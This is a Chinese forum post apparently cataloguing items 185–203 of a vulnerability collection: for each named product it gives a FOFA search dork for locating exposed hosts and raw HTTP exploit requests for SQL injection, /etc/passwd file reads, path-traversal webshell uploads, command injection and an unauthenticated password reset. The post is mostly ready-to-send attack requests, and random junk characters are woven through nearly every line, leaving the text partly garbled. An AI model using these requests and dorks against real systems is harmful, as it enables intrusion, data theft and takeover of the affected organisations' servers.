- U9 S' [3 G1 Z3 w8 r! ?. N3 qversion < 7.0.5.1
( `( ~7 S/ V% b: uFOFA:app="REALOR-天翼应用虚拟化系统"
3 h4 V( v% Z: E6 A- w7 MGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1$ p8 @9 L+ A/ W/ |7 w
Host: host
& d9 Y( ~& t3 J- W- p! ?3 q l7 e Y- D
& e' f4 A' } |( w186. F-logic DataCube3 SQL注入1 n0 ?( d! l' A* H) p
CVE-2024-31750
" V) b3 `( h) I9 n, h9 F9 S. o5 b% i) FF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统2 g% L9 U7 [0 i. B2 D+ c" D3 Z
FOFA:title=="DataCube3"
7 m6 T# `: b' l$ tPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
; ~ y5 h& n/ n% o/ k, bHost: your-ip
* f" I% v6 l: @2 v/ @- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
- d q6 A% W6 z& yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.80 S( ?0 _# E$ R# M$ m1 p( Y; Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# w" M3 m9 q+ t, Q! p* Q4 Q8 m+ g
Accept-Encoding: gzip, deflate9 U5 b3 l E2 L. Q/ n3 L
Connection: close
; W: F ]! D8 W0 r% xContent-Type: application/x-www-form-urlencoded) o6 T' g4 E: s0 O1 V
! x% N4 e) q; `- N, K3 I- v- b
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
/ G, C3 p! W q4 y- i4 u
@7 W& M# _* c# q0 F* U: H1 d3 _2 g- Q0 P5 Q: N* P3 g8 l% ~
187. Mura CMS processAsyncObject SQL注入
% @7 @, E; N! {) C) G6 L* U5 V8 ~CVE-2024-32640
6 q( R# [6 s; L6 tFOFA:"Mura CMS"
) N3 T1 o. ~; d( U8 }3 xPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ k% H8 ?0 D4 x% X; O
Host: your-ip) A5 w! `3 Y$ m$ t7 D: H
Content-Type: application/x-www-form-urlencoded9 R/ q: k; x1 z' x: M/ U
2 X3 ?" a9 y& U( r3 ]" a
5 p( Q* _9 m# C" y6 @
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
) d9 z# m$ X9 c0 R4 Z" N, p- |! m# s4 f; _; a1 L
, W3 y8 s$ O( ]5 E; G/ [
188. 叁体-佳会视频会议 attachment 任意文件读取0 a! Y" B E5 t4 M, m
version <= 3.9.76 T, Z$ u0 {& L: m
FOFA:body="/system/get_rtc_user_defined_info?site_id"
$ a* H5 \! M1 }6 I1 p! {2 ?GET /attachment?file=/etc/passwd HTTP/1.1; _3 P+ ]3 f: ?
Host: your-ip0 ]% N3 S* s S+ I3 `; a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( r( X; t. ~1 T2 V" `8 b, ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: A" t; n9 k. ~" p1 zAccept-Encoding: gzip, deflate5 E7 t# q6 F0 a) C# Y0 ]' w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.87 B* L4 {. r7 i! V3 A
Connection: close
@9 q2 _0 H$ {+ }* v4 ] z' u$ j j
* N. H6 A3 z, f' C/ Q Q& n189. 蓝网科技临床浏览系统 deleteStudy SQL注入! F1 q N% x* R1 h
FOFA:app="LANWON-临床浏览系统"9 D2 M+ y8 ?5 x" m, e+ l B
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ ^! i6 {: {0 s( u$ v" P e
Host: your-ip' y- N3 S0 Q! R3 I+ _
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* S1 u S2 b2 [# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* b4 k) P4 b6 R$ L$ x# g* xAccept-Encoding: gzip, deflate
+ \3 Y4 _& W- R6 K# }+ cAccept-Language: zh-CN,zh;q=0.9+ o3 j; T/ D" U ]; B% g8 G4 x
Connection: close
, {. y: g& O1 P6 b( p3 P! z0 P6 }1 \0 l6 ^" v V2 p
" ~; N, ]* e/ ^5 t+ d, n* J190. 短视频矩阵营销系统 poihuoqu 任意文件读取+ v1 x- R* C0 p& ?# S% Q0 V
FOFA:title=="短视频矩阵营销系统"( K: r- g. V1 `' M
POST /index.php/admin/Userinfo/poihuoqu HTTP/2. r. n* {( F m
Host: your-ip* b. N, q; [& Y: @2 N6 L* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 |. H b, n1 N% }1 S9 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 N1 c3 s' R4 V0 ~, I* }* sContent-Type: application/x-www-form-urlencoded
6 T$ R$ r, k7 \6 ^Accept-Encoding: gzip, deflate
5 K W& J9 G# R6 qAccept-Language: zh-CN,zh;q=0.9
% C. F: k/ D4 {" M1 L, E3 U- ^
! v: |) T! c$ Z; X1 Qpoi=file:///etc/passwd5 ]# c4 |1 [5 R- b. { Q6 N
& c( O, N: z0 S4 @3 w
9 M2 F* F+ n/ ]+ v/ _) C. U191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入( n' Z3 D' z! N5 Q/ D4 k- W _
FOFA:body="/CDGServer3/index.jsp"
, e% ~2 G# {6 N1 IPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
' k+ A- H% {/ kHost: your-ip3 }1 f( D1 x! a% {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 C! f' x; R" o# I
Content-Type: application/x-www-form-urlencoded7 s' q) B) U3 l# Y7 B5 Y
0 h2 I8 n. C5 ?. A. z$ o+ {command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: Q/ P6 [8 l8 X6 n6 T
9 z1 y4 f3 V+ y. c
$ A1 P. ?9 n+ U( U- E192. 富通天下外贸ERP UploadEmailAttr 任意文件上传 V. g) R* y0 y, k
FOFA:title="用户登录_富通天下外贸ERP"2 P- P. }. O. H9 x4 O
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+ f6 \, r4 |) q+ f( {, kHost: your-ip
0 x' f/ n4 |& W3 `2 `( }; s* I/ TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 b( W. r, P9 U" E+ CContent-Type: application/x-www-form-urlencoded) `, M c' I4 o, |+ Q- f
( r( y1 Z# {' w* D& g. z5 f. T4 V# \; n y
<% @ webhandler language="C#" class="AverageHandler" %>9 T, U$ w* a: T4 y
using System;
, g- O& f/ x% G+ lusing System.Web;& {" j9 T5 Y$ \* c" j( D9 y
public class AverageHandler : IHttpHandler
X# q+ w5 B! \1 x, w# O# S{: [- y) u& G0 J3 G2 N
public bool IsReusable$ O$ V- x. F2 o {
{ get { return true; } }! m3 Q+ k }+ A$ b. c; ?8 @, s1 v5 y
public void ProcessRequest(HttpContext ctx); E3 R$ D5 z9 ?# I/ l( e, s
{/ f) B; k1 l, Z2 l) B
ctx.Response.Write("test");
5 w1 G) E6 x; j: C0 I" K}
- D% B" P0 {% N. s% g, v}
" I; R3 C5 Z4 R6 d8 `" K5 Y+ d# A4 }. |4 I5 A: R
. m. B& t" n& w% Z193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行, F" U9 _, O- {% y
FOFA:body="山石云鉴主机安全管理系统"
8 f7 |6 Z7 A7 t: N. {GET /master/ajaxActions/getTokenAction.php HTTP/1.1% J' w7 ~1 G$ o" L' I- f: C
Host:
; u6 u( U4 l, r# `8 vCookie: PHPSESSID=2333333333333;
; k l ^6 a# a& vContent-Type: application/x-www-form-urlencoded$ w$ K0 k$ m( A/ B: D: ^
User-Agent: Mozilla/5.0# O# W7 J* @, M# w& z
h* p. l" K& F" l8 w3 n7 i2 o% R! c& E/ ^0 g1 c
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
$ D9 T3 z3 J1 w5 HHost:
5 `2 {% i, W f0 CUser-Agent: Mozilla/5.08 t, v" ]1 B5 j. `$ U6 {
Accept-Encoding: gzip, deflate( A# G- z/ G2 Z/ d
Accept: */*
1 y8 E5 g* K) X8 z: d# wConnection: close, }$ ]. n. P- {2 k: O4 J6 ^
Cookie: PHPSESSID=2333333333333;
2 ?& c. ]. E/ O# i; `0 t0 rContent-Type: application/x-www-form-urlencoded
! m4 ?5 j6 d4 ~Content-Length: 84
+ |: [0 a* b( ]9 ^+ Y
2 Q9 h+ j' o( |* V! xparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
9 s) s* E9 F5 I2 j# s3 G6 c6 T7 ^. e% y0 ]$ }
1 N" K$ Z* F) l
GET /master/img/config HTTP/1.1
& ]+ q9 G* m- D3 _$ V: f3 q7 J7 GHost:
# B3 _0 O3 w; a# h" jUser-Agent: Mozilla/5.0( j, W$ T y; O# ^$ F1 U2 o
) M# P( }# Z9 C
7 P+ [- B: \$ ]& K6 @: w* M, N7 R
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传/ y. [. H9 J" w) ?* @7 J* E
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在9 p) m* [5 Q* u: K
2 C0 A+ l2 H: n6 _& N# J. S
POST /servlet/uploadAttachmentServlet HTTP/1.12 U+ |/ m5 Z0 N' E& i* l
Host: host/ N" a1 r- z! {* j I: J. Y( x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
7 ~4 u# d" i! p( O4 k+ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 Z, a: f1 M( O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 @$ d1 E2 A! m) z- Y n* O7 ^Accept-Encoding: gzip, deflate* E; F+ L( Z6 u7 z9 d; w' O- l* e
Connection: close/ i: u$ }) z9 }8 |& P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ K' G* g- ^* ]# D6 l6 A------WebKitFormBoundaryKNt0t4vBe8cX9rZk
, o: T; U D7 e0 A& ?) w' l8 k: J$ W
& O# F, q( w Q! l( z6 ZContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"! A# T% ?* c" _& W
Content-Type: text/plain
% ]+ E G# j1 g* R<% out.println("hello");%>
: [6 ]. [' x* f% b$ q4 x------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- a" x- X/ h5 A- d2 N! YContent-Disposition: form-data; name="json"
' y' K2 v; n9 l) j: s3 J {"iq":{"query":{"UpdateType":"mail"}}}
7 K( K7 n1 ~9 w' F% j/ U& a% B: o9 Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk--+ m! ~8 N8 l% H) g
1 Q$ B8 Z% j6 m5 w
% H3 c+ O+ @" Z% F3 [& ~
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
& f( g5 A/ _! H: X( }0 C2 JFOFA:title=="飞鱼星企业级智能上网行为管理系统5 H- `$ \1 ^" I
POST /send_order.cgi?parameter=operation HTTP/1.1( I4 U2 \' Q+ k4 `* Q4 s
Host: 127.0.0.17 H* W7 C6 O( W% g! }2 ]
Pragma: no-cache
* z4 Y' }5 f7 m: p0 dCache-Control: no-cache
' I. J) R( M+ w" c7 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* w) i& |. n' |3 yAccept: */*" o, \+ {% V8 F7 q1 Z: T1 h6 k
Accept-Encoding: gzip, deflate
5 C. ~8 H* p) T8 LAccept-Language: zh-CN,zh;q=0.9; a5 b2 K: A! @3 _& s r' t' u" f
Connection: close+ f8 ]& u$ H b4 M( C
Content-Type: application/x-www-form-urlencoded
4 S8 ?9 j5 J7 d W pContent-Length: 68' e! u6 W6 t& H' @# T! {
% q. t; n4 n* N{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 X& w2 _# [. X# Y# t$ ?
+ Q% A( C5 F9 |
$ \9 x. h% ?" Z
196. 河南省风速科技统一认证平台密码重置
# Z. {" R, j6 a: X3 c) m1 pFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
# T5 S' _+ C2 f! B/ ~" OPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
8 u/ V& @$ b6 d: L; Q1 o1 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) A) j8 V7 i: y6 _) e7 K4 U7 n, tContent-Type: application/json;charset=UTF-8
5 [3 @! z* L' y1 w* s$ pX-Requested-With: XMLHttpRequest( ^# T% n [6 Q' c/ R3 P
Host:
1 U; m# a) t* m. I: r; j" r9 o, b/ rAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.22 ?7 z* Z( m5 n
Content-Length: 45( z- S7 F, w+ x: Q) `; h
Connection: close
" }& ]: e+ ^; Y# g2 c: Z9 V6 z2 g* G( b
{"xgh":"test","newPass":"test666","email":""}* m, e+ U# O+ D( Z
' u5 }7 v. p4 ?. {! F( r
; I( r: D: L6 D3 H! ^4 h" G9 I/ m+ g/ {
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 @- m: f% c/ @. S* ^ W' L8 w8 J
FOFA:app="浙大恩特客户资源管理系统"
$ g$ a. q. ]. |& E. nGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 o+ O6 A) K1 O' [( P
Host:
- g/ i( `: T" |- G. EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36+ m8 B7 n1 A a7 y' y0 }+ }# ~% `" S
Accept-Encoding: gzip, deflate
0 p/ L/ A! H2 m0 U; A9 kConnection: close
9 M: o: d# p1 Q; r% C2 |* }6 s5 W2 `( I& C+ z. q9 n9 m8 ^3 B" X
$ j, {, j# `5 y* w( s0 _6 V/ v/ {
! s- u( q1 o% ?4 j& P$ C
198. 阿里云盘 WebDAV 命令注入
0 H6 \% _/ C+ {5 P" f8 ]$ cCVE-2024-29640
/ r$ z& |2 w7 x' r8 |& c. Z# [; eGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.16 p/ e% Q4 O6 J% _
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64$ Y+ \3 y# u* R, m: J5 R8 @
Accept: */*
3 T: J& f: h0 o" H0 z; N. eAccept-Encoding: gzip, deflate
- D- C; }! Y v& v9 x$ N3 T. m( |4 vAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
- y' v9 q; Y2 j. c- hConnection: close2 ?& q- I5 ]2 ~5 [
1 p; {5 s3 a& B$ M3 n9 l# _
8 S1 `% B& v, e7 X2 P199. cockpit系统assetsmanager_upload接口 文件上传
8 {. J1 }2 N, g) T( H' h8 g- T( |- \. f/ ^& X( m
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& V3 A9 n$ m* l# h& f7 M0 kGET /auth/login?to=/ HTTP/1.13 [7 T; U+ p$ O- m8 N. ^# l
# w( l8 z* Z1 ~9 ~0 Q0 t u' x响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
# j m1 I+ f* o! I+ A- u1 _, X7 Y0 b/ [8 I0 F( N
2.使用刚才上一步获取到的jwt获取cookie:3 s; v _- A6 t+ Q# \4 w1 q
4 }! E& P. f/ n; r; @! t! i- yPOST /auth/check HTTP/1.11 }% D6 W0 w! u! U6 r- j7 M
Content-Type: application/json& ]/ G7 ]6 W9 _3 R
5 n: ^4 Z1 `) T' ?3 f3 M
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}: a5 ^2 a2 L/ C1 ~$ B
0 [ @: f+ ^# i/ A响应:200,返回值:" E! q- |7 R2 u. s5 X! L" W* d
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
& m( _$ S* T0 U4 y% P0 ]# cFofa:title="Authenticate Please!"5 n: T( h, v/ i5 J1 G% l. |
POST /assetsmanager/upload HTTP/1.1
+ H, E* ~4 R) B+ A0 u0 vContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3- e9 X& q; {8 D: Z0 A
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92! H& _1 [! X$ @8 N
: \) b4 b3 _$ q-----------------------------36D28FBc36bd6feE7Fb3
+ X k& g" _! C- w3 m: I8 x: CContent-Disposition: form-data; name="files[]"; filename="tttt.php"; R7 K$ q4 d8 i- j1 d
Content-Type: text/php0 N( g3 ?1 d+ e
* ~, p4 n8 |$ ~* F* J% X<?php echo "tttt";unlink(__FILE__);?>3 H7 d( O+ q! H+ d0 u# A
-----------------------------36D28FBc36bd6feE7Fb3( k7 ^* [+ `4 B3 u
Content-Disposition: form-data; name="folder"
. Z: i& ~6 I8 l9 U5 K
- }8 ?3 `2 V+ D: ]-----------------------------36D28FBc36bd6feE7Fb3--1 H7 ^# A- H0 h( g6 R3 x0 N
{6 q- u# _- ~
$ \) r: @/ s! H0 l2 f
/storage/uploads/tttt.php8 e3 d, q8 ~" D+ Z! M
H# x4 k5 O; P# }' u2 ?200. SeaCMS海洋影视管理系统dmku SQL注入
5 D5 f6 R7 s( B y9 s& H8 g3 N* ?FOFA:app="海洋CMS"
9 f% r7 R# w* `8 ]; `GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
0 \# }* v5 O: ] PCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
" \, Z+ j, h* TUpgrade-Insecure-Requests: 12 R! a1 v! h+ g3 z( O) @. _
Cache-Control: max-age=0
5 T1 c4 _, ^5 \: F+ B- ^/ A6 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 {: W, D" N A) oAccept-Encoding: gzip, deflate) ]' p! a% s9 _( R9 r( O, ^
Accept-Language: zh-CN,zh;q=0.9* C U+ F0 e" X" R: ~2 \4 P3 ?% s& B
' P, ?( u n/ t( q3 [2 z5 q$ x! b9 s- X: O
201. 方正全媒体新闻采编系统 binary SQL注入% Q# A& A1 N9 k' U( n, G
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
: m4 B- F, k# G/ y; K/ M7 M5 MPOST /newsedit/newsplan/task/binary.do HTTP/1.1# ]. O4 k( W" s6 c
Content-Type: application/x-www-form-urlencoded8 V+ c& a5 w0 E; c6 z* ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& q U% c9 X: F# H. {: B7 @( G- f2 lAccept-Encoding: gzip, deflate. \; q3 d" e; b( s7 U
Accept-Language: zh-CN,zh;q=0.9
. [ J+ x% y. f- H9 p4 B. r1 {Connection: close
: P& ]7 _. v6 s' x& A% P1 u+ B' ]& g+ j- H% l
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=17 C4 G+ ^- Z3 z& ]
9 r# h/ H8 B* E9 t" S% u. T, S5 l- _9 @% |: d$ g
202. 微擎系统 AccountEdit任意文件上传
, e4 S( o9 \3 d+ vFOFA:body="/Widgets/WidgetCollection/"
7 n+ P7 R' H* @4 X7 M" N获取__VIEWSTATE和__EVENTVALIDATION值
7 e; P* R% b3 K9 M9 {7 [: u) TGET /User/AccountEdit.aspx HTTP/1.1
( E1 G4 t/ F9 j$ r$ }0 z3 |& MHost: 滑板人之家
" {8 }' q% w* O* |, rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31, o( S% t# o6 A! Y2 ` ^# x
Content-Length: 0
3 p: `* d: n( b' D1 h" Q, F3 x. ], z D
! {# W/ J0 i( n _" n1 v0 a
替换__VIEWSTATE和__EVENTVALIDATION值
t! y8 _$ O) J4 H" L7 JPOST /User/AccountEdit.aspx HTTP/1.1% V4 z) o+ d6 I4 l* l
Accept-Encoding: gzip, deflate, br
. {, z3 F0 A; c: z3 nContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687& t. u, S7 G/ g; U
) `7 D; Y6 n* e7 j-----------------------------786435874t38587593865736587346567358735687) C' g: s( e: c
Content-Disposition: form-data; name="__VIEWSTATE"
( i" _. }( {& c$ Z/ a$ ^- I
0 f7 f8 w- P! {8 q__VIEWSTATE
; N& j' j$ R7 a- o3 _% Q-----------------------------786435874t38587593865736587346567358735687
4 D7 q! }) L, QContent-Disposition: form-data; name="__EVENTVALIDATION"* e4 r8 t" ~$ r' c' O
* B' {9 U, ]2 U6 m$ y__EVENTVALIDATION: u/ b0 T% \+ k5 |% g
-----------------------------786435874t38587593865736587346567358735687
" v4 ?( P3 S. [' M/ i% U E" iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
: I' h$ Y% f c; j4 {4 E2 eContent-Type: text/plain
" j' W/ O; q! R( U; z8 X8 S( J8 r# |) B% I" `' I9 [( {, T
Hello World!7 ]4 i2 {; t, v
-----------------------------786435874t38587593865736587346567358735687
+ r5 f* e% i0 u9 o; dContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
3 g1 R: e& X; [3 T% Q8 K1 p) {( n/ u. |3 K: z3 w0 t+ l6 O8 A& l7 i
上传图片$ E# I9 v) N. j* e
-----------------------------786435874t38587593865736587346567358735687* ?: e- q, g; K# f' M9 Z/ P
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
$ g& D& `, L4 _0 N$ J/ k3 \! }' [: E3 q
1 U! [* o* Q" {-----------------------------786435874t38587593865736587346567358735687
% g. }, A3 j! M/ p' x& R5 rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
" S" ]4 T+ Z* }: k$ @% q% Q e1 U! P* _
1 [% z/ Z) }+ U6 f- k-----------------------------786435874t38587593865736587346567358735687--. I7 i6 I0 x( C+ b
7 z( A( i* N4 z( Z3 ^
* q) ^. x$ h+ |( S& }! k3 o
/_data/Uploads/1123.txt) t& k. m" s W6 C: G/ r* P
. l5 B: @0 v4 b& \/ B3 Q) w! O
203. 红海云EHR PtFjk 文件上传1 x7 T- \: L' L5 H* J" H
FOFA:body="RedseaPlatform"
' O5 b& ~8 j- x6 L& D% n2 `: RPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
! i$ N; c) W. F/ a( qHost: x.x.x.x# j9 T) `# D8 E a
Accept-Encoding: gzip9 ^% L0 m6 V7 F; L: K4 E* I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( P3 T+ U* |$ T& Q6 X* u9 LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
8 P, D; u2 P/ }- LContent-Length: 210" p/ x' e' `8 H( E$ _
3 m% T N( t3 Z: J
------WebKitFormBoundaryt7WbDl1tXogoZys4
" C1 F* _0 k8 {+ M+ ~) yContent-Disposition: form-data; name="fj_file"; filename="11.jsp"+ T$ `; d: z/ z1 o. q
Content-Type:image/jpeg9 S `8 @, k% K
% M0 {) C% v4 p( y# D5 R
<% out.print("hello,eHR");%>/ e0 F0 F( d I1 F/ ~/ M
------WebKitFormBoundaryt7WbDl1tXogoZys4--4 j/ {5 p/ L7 Q! v4 o. Z5 d
2 l% x& F+ R: k
2 o4 i3 {' l! O7 i" {) t
, H4 s+ D* \4 M. U3 Y/ K0 W* Z( X9 y; S. j: v
8 X0 w1 ?! v3 y3 ?. ^" O4 \. w) {# r
|
发表于 2024-6-5 14:31:29
收藏
支持
反对